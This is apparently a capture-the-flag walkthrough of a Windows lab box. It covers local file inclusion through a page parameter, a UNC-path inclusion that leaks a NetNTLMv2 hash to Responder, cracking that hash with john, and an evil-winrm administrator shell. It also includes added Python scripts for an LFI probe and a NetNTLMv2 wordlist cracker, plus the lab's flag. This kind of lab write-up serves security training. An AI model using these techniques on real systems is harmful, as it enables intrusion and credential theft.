ip
10.129.81.165
nmap
nmap -sC -sV 10.129.81.165
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-17 00:31 EDT
Nmap scan report for 10.129.81.165
Host is up (0.064s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
|_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
nmap -p1-6000 10.129.81.165
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-17 00:33 EDT
Nmap scan report for 10.129.81.165
Host is up (0.064s latency).
Not shown: 5998 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
5985/tcp open wsman
Add the unika.htb hostname to the hosts file:
echo "10.129.81.165 unika.htb" | sudo tee -a /etc/hosts
The page parameter in the URL is used to load different versions of the webpage.
Passing ../../../../../../../../windows/system32/drivers/etc/hosts as its value makes the include read the Windows hosts file, confirming a local file inclusion (LFI) vulnerability:
http://unika.htb/index.php?page=../../../../../../../../windows/system32/drivers/etc/hosts
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#	127.0.0.1       localhost
#	::1             localhost
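The traversal above can be generalised into a probe that tries both Windows and Linux targets at increasing depth and confirms a hit by a file signature rather than by eye. This is an added example, not code from the original write-up; the endpoint shape (index.php?page=) matches the page, while the fake_fetch stand-in, its web-root depth and the response strings are constructed so the script runs offline.

```python
"""Probe an include parameter for path traversal (LFI).

Added example, not code from the original write-up. It assumes an endpoint
of the form http://host/index.php?page=<value> that hands the value to a
file include. The fetch function is injected so the same logic runs offline
against a constructed stand-in for the target and, unchanged, against a
real host with http_fetch."""
from typing import Callable, Iterator, Optional, Tuple
from urllib.parse import parse_qs, quote, urlparse
import urllib.request

# Files present on a default install, with a substring that proves they were read.
TARGETS = {
    "windows": ("windows/system32/drivers/etc/hosts", "Microsoft TCP/IP for Windows"),
    "linux": ("etc/passwd", "root:x:0:0"),
}


def traversal_payloads(target: str, max_depth: int = 10) -> Iterator[Tuple[int, str]]:
    """Yield (depth, '../'*depth + target) from shallow to deep.

    Both Windows and Linux ignore '../' above the filesystem root, so
    overshooting is harmless; starting shallow makes the first hit reveal
    how deep the web root sits."""
    for depth in range(1, max_depth + 1):
        yield depth, "../" * depth + target


def find_lfi(fetch: Callable[[str], str], base_url: str, param: str = "page",
             max_depth: int = 10) -> Optional[dict]:
    """Try every OS target at every depth; return the first confirmed hit."""
    for os_name, (target, signature) in TARGETS.items():
        for depth, payload in traversal_payloads(target, max_depth):
            url = f"{base_url}?{param}={quote(payload, safe='/.')}"
            if signature in fetch(url):
                return {"os": os_name, "depth": depth, "payload": payload, "url": url}
    return None


def http_fetch(url: str, timeout: float = 10.0) -> str:
    """Fetch for a real engagement; any error counts as 'no hit'."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except Exception:
        return ""


# Constructed stand-in for the target so the probe runs offline (not real traffic).
WEBROOT_DEPTH = 3  # assumed: web root three directories below the drive root
FAKE_HOSTS = ("# Copyright (c) 1993-2009 Microsoft Corp.\n"
              "# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\n")


def fake_fetch(url: str) -> str:
    """Mimic include($_GET['page']) on a Windows box: the hosts file comes
    back only once the traversal climbs at least WEBROOT_DEPTH levels."""
    page = parse_qs(urlparse(url).query).get("page", [""])[0]
    if page.endswith(TARGETS["windows"][0]) and page.count("../") >= WEBROOT_DEPTH:
        return FAKE_HOSTS
    return "<b>Warning</b>: include(): Failed opening for inclusion"


if __name__ == "__main__":
    print(find_lfi(fake_fetch, "http://unika.htb/index.php"))
    # on the real target: find_lfi(http_fetch, "http://unika.htb/index.php")
```

The depth of the first hit tells you where the web root sits, which is useful later for reaching log files or config files by a known relative path; against the real box, swap fake_fetch for http_fetch.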
gobuster
gobuster dir -u http://10.129.81.165 -w /usr/share/wordlists/dirb/big.txt -t 64 -x .php,.txt,.html
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.81.165
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,txt,html
[+] Timeout: 10s
===============================================================
2022/07/17 00:40:19 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd (Status: 403) [Size: 302]
/.htaccess (Status: 403) [Size: 302]
/.htpasswd.php (Status: 403) [Size: 302]
/.htaccess.php (Status: 403) [Size: 302]
/.htpasswd.txt (Status: 403) [Size: 302]
/.htaccess.txt (Status: 403) [Size: 302]
/.htaccess.html (Status: 403) [Size: 302]
/.htpasswd.html (Status: 403) [Size: 302]
/Index.php (Status: 200) [Size: 61]
/English.html (Status: 200) [Size: 46453]
/aux (Status: 403) [Size: 302]
/aux.php (Status: 403) [Size: 302]
/aux.txt (Status: 403) [Size: 302]
/aux.html (Status: 403) [Size: 302]
/cgi-bin/ (Status: 403) [Size: 302]
/cgi-bin/.html (Status: 403) [Size: 302]
/com1.html (Status: 403) [Size: 302]
/com3.php (Status: 403) [Size: 302]
/com2.php (Status: 403) [Size: 302]
/com4 (Status: 403) [Size: 302]
/com1 (Status: 403) [Size: 302]
/com2.txt (Status: 403) [Size: 302]
/com3.txt (Status: 403) [Size: 302]
/com4.html (Status: 403) [Size: 302]
/com1.php (Status: 403) [Size: 302]
/com2.html (Status: 403) [Size: 302]
/com3.html (Status: 403) [Size: 302]
/com4.php (Status: 403) [Size: 302]
/com3 (Status: 403) [Size: 302]
/com2 (Status: 403) [Size: 302]
/com1.txt (Status: 403) [Size: 302]
/com4.txt (Status: 403) [Size: 302]
/con (Status: 403) [Size: 302]
/con.php (Status: 403) [Size: 302]
/con.txt (Status: 403) [Size: 302]
/con.html (Status: 403) [Size: 302]
/css (Status: 301) [Size: 336] [--> http://10.129.81.165/css/]
/english.html (Status: 200) [Size: 46453]
/examples (Status: 503) [Size: 402]
/french.html (Status: 200) [Size: 47199]
/german.html (Status: 200) [Size: 46984]
/img (Status: 301) [Size: 336] [--> http://10.129.81.165/img/]
/inc (Status: 301) [Size: 336] [--> http://10.129.81.165/inc/]
/index.php (Status: 200) [Size: 61]
/js (Status: 301) [Size: 335] [--> http://10.129.81.165/js/]
/licenses (Status: 403) [Size: 421]
/lpt2 (Status: 403) [Size: 302]
/lpt1 (Status: 403) [Size: 302]
/lpt2.php (Status: 403) [Size: 302]
/lpt1.php (Status: 403) [Size: 302]
/lpt1.txt (Status: 403) [Size: 302]
/lpt2.txt (Status: 403) [Size: 302]
/lpt1.html (Status: 403) [Size: 302]
/lpt2.html (Status: 403) [Size: 302]
/nul.txt (Status: 403) [Size: 302]
/nul.html (Status: 403) [Size: 302]
/nul (Status: 403) [Size: 302]
/nul.php (Status: 403) [Size: 302]
/phpmyadmin (Status: 403) [Size: 421]
/prn (Status: 403) [Size: 302]
/prn.php (Status: 403) [Size: 302]
/prn.txt (Status: 403) [Size: 302]
/prn.html (Status: 403) [Size: 302]
/sección (Status: 403) [Size: 302]
/sección.php (Status: 403) [Size: 302]
/sección.txt (Status: 403) [Size: 302]
/sección.html (Status: 403) [Size: 302]
/server-status (Status: 403) [Size: 421]
/server-info (Status: 403) [Size: 421]
/webalizer (Status: 403) [Size: 421]
responder
sudo responder -I tun0
Poisoners: LLMNR [ON] NBT-NS [ON] MDNS [ON] DNS [ON] DHCP [OFF]
Servers: HTTP server [ON] HTTPS server [ON]
Perform a remote file inclusion (RFI) by pointing the page parameter at a UNC path on the attacking machine, //10.10.16.17/somefile, while Responder is running. PHP on Windows tries to open the share, so the server authenticates to Responder's SMB listener and the NetNTLMv2 response is captured:
http://unika.htb/index.php?page=//10.10.16.17/somefile
[SMB] NTLMv2-SSP Client : ::ffff:10.129.81.165
[SMB] NTLMv2-SSP Username : RESPONDER\Administrator
[SMB] NTLMv2-SSP Hash : Administrator::RESPONDER:3ba223fc6c4554d...
Save the full hash line (Administrator::RESPONDER:...) to nthash.txt, for example with nano.
john
john -w=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt nthash.txt
John detects the netntlmv2 format from the line itself; add --format=netntlmv2 if it picks something else.
Password: badminton User: Administrator
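What john does with that capture is worth seeing end to end: the server challenge and blob are public, the NTProofStr field is an HMAC-MD5 keyed by a value derived from the NT hash, so each wordlist candidate is turned into a NT hash and checked against the captured proof. The block below is an added example, not code from the original write-up, Responder or john. Because the page's hash is truncated, the capture line is constructed from the page's user, domain and recovered password with a made-up challenge and blob.

```python
"""Check a Responder NetNTLMv2 capture against a wordlist, the way john does.

Added example, not code from the original write-up, Responder or john. It
implements the MS-NLMP NTLMv2 chain:
  NT hash     = MD4(UTF-16LE(password))
  NTOWFv2     = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain))
  NTProofStr  = HMAC-MD5(NTOWFv2, server challenge + blob)
MD4 is written out because hashlib may not expose it on OpenSSL 3 builds.
The capture line is constructed (the page's hash is truncated): it reuses the
page's user, domain and password with a made-up challenge and blob."""
import hmac
import struct
from typing import Iterable, Optional


def _lrot(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    ff = lambda x, y, z: (x & y) | (~x & z)
    gg = lambda x, y, z: (x & y) | (x & z) | (y & z)
    hh = lambda x, y, z: x ^ y ^ z
    rounds = (
        (ff, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (gg, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (hh, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                a = _lrot((a + fn(b, c, d) + x[idx] + k) & 0xFFFFFFFF, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers: next step updates old d
        a, b, c, d = ((a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF,
                      (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF)
    return struct.pack("<4I", a, b, c, d)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    # the user name is upper-cased, the domain is used as captured (MS-NLMP 3.3.2)
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), "md5").digest()


def nt_proof_str(password: str, user: str, domain: str, challenge: bytes, blob: bytes) -> bytes:
    return hmac.new(ntowf_v2(password, user, domain), challenge + blob, "md5").digest()


def parse_capture(line: str) -> dict:
    """Responder/john netntlmv2 line: user::domain:serverchallenge:ntproofstr:blob."""
    user, _, rest = line.strip().partition("::")
    domain, challenge, proof, blob = rest.split(":", 3)
    return {"user": user, "domain": domain, "challenge": bytes.fromhex(challenge),
            "proof": bytes.fromhex(proof), "blob": bytes.fromhex(blob)}


def crack(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose NTProofStr matches the capture, else None."""
    cap = parse_capture(line)
    for cand in wordlist:
        cand = cand.rstrip("\r\n")
        if nt_proof_str(cand, cap["user"], cap["domain"], cap["challenge"], cap["blob"]) == cap["proof"]:
            return cand
    return None


def forge_capture(user: str, domain: str, password: str, challenge: bytes, blob: bytes) -> str:
    """Build a capture line for a known password; used here only to make test data."""
    proof = nt_proof_str(password, user, domain, challenge, blob)
    return f"{user}::{domain}:{challenge.hex()}:{proof.hex()}:{blob.hex()}"


# Constructed sample: the page's user/domain/password, made-up challenge and NTLMv2 blob.
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_BLOB = bytes.fromhex("0101000000000000" + "00" * 8 + "aabbccddeeff0011"
                            + "00000000" + "00000000" + "00000000")
SAMPLE_LINE = forge_capture("Administrator", "RESPONDER", "badminton", SAMPLE_CHALLENGE, SAMPLE_BLOB)
SAMPLE_WORDLIST = ["123456", "password", "badminton", "letmein"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack(SAMPLE_LINE, SAMPLE_WORDLIST))
```

Against a real capture, crack(open("nthash.txt").read(), open(rockyou_path, errors="ignore")) gives the same answer as john, only far slower; the point of the block is to show that nothing in the capture is secret except the password, which is why a cleartext-equivalent credential falls to a wordlist as soon as the SMB client can be coaxed into authenticating to an attacker-controlled share.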
evil-winrm
evil-winrm -i 10.129.81.165 -u administrator -p badminton
Evil-WinRM shell v3.4
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
From the shell, use ls and cd to move to C:\Users\mike\Desktop, where flag.txt is:
flag.txt = ea81b7afddd03efaa0945333ed147fac